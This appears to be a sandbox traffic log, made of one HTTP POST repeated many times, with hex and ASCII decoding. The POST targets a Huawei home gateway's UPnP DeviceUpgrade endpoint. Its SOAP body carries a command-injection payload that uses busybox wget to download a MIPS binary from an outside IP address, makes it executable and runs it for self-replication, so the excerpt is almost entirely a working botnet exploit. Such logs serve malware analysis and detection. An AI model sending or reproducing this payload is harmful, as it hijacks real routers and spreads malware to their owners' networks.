75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
